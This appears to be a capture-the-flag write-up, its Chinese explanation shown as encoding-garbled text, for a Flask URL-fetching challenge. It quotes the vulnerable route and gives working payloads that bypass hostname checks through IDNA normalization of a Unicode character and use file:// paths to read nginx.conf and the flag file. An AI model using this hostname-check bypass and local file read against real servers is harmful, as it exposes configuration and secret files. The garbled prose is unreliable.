@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url") # č®¾ url=https://xxx.com/index.php
host = parse.urlparse(url).hostname # xxx.com
if host == 'suctf.cc':
return "ęę your problem? 111"
parts = list(urlsplit(url)) # ['https', 'xxx.com', '/index.php', '', '']
host = parts[1] # xxx.com
if host == 'suctf.cc':
return "ęę your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#å»ę url äøēē©ŗę ¼
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "ęę your problem? 333"
</code>
# <!-- Dont worry about the suctf.cc. Go on! -->
# <!-- Do you know the nginx? -->
ę¬é¢éč¦ē»čæē¬¬äøå±åē¬¬äŗå±ēååå¤ęļ¼å¹¶äøåØē»åäøꬔ idna ē¼ē åēē¬¬äøå±äøåč¦ē¬¦å host åäøŗ suctf.cc ļ¼idna ēä¾åå¦äøć
print('ā'.encode('idna').decode('utf-8'))
# c
å ę¤åÆ仄éčæēęē¬¦å·ę„ē»čæē¬¬äøå±åē¬¬äŗå±ēē»čæ并äøåē¬¦å host åäøŗ suctf.cc ćåå äøŗé¢ē®äøå
å«ęē¤ŗ Do you know the nginx ę
éč¦ä» nginx ēēøå
³ę件äøę„ę¾ flag ļ¼ęååÆ仄åØ /usr/local/nginx/conf/nginx.conf äøę¾å°ēøå
³äæ”ęÆļ¼Payload 仄ååę¾å¦äøęē¤ŗć
# url=file://suctf.cā/../../../../../../../../usr/local/nginx/conf/nginx.conf
server {
listen 80;
location / {
try_files $uri @app;
}
location @app {
include uwsgi_params;
uwsgi_pass unix:///tmp/uwsgi.sock;
}
location /static {
alias /app/static;
}
# location /flag {
# alias /usr/fffffflag;
# }
}
url=file://suctf.cā/../../../../../../../../usr/fffffflag
